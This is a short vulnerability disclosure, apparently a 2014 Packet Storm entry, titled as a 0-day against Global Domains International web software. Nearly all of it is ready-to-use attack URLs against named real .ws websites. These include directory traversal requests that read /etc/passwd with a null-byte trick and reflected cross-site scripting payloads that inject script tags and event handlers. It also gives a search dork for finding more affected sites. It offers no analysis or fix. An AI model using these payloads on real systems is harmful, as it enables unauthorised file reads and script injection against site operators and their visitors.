Global Domains International Cross Site Scripting / Traversal

2014-05-07T00:00:00
ID PACKETSTORM:126545
Type packetstorm
Reporter indoushka
Modified 2014-05-07T00:00:00

Description

                                        
                                            `Global Domains International Directory traversal Vulnerability 0-Day  
====================================================================  
Author : indoushka  
vendor : http://www.nic.ws  
========================================================  
# Dork : Copyright © 2014 by Global Domains International, Inc · All Rights Reserved  
  
http://www.nic.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
https://www.website.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
http://www.7.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
http://www.movie.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
http://welcome-back.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11  
  
Cross site scripting (verified) :  
  
/article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(771818860)%20bad%3d%22  
  
/kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11  
  
/members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>  
  
/orderflow/index.dhtml?sponsor=1'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>  
  
http://freedom.ws//?language=french%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28771818860%29%3C/ScRiPt%3E  
  
freedom.ws/show_dvd.dhtml?language=spanish'"()%26%25<ScRiPt >prompt(771818860)</ScRiPt>&sponsor=gditraffic  
  
`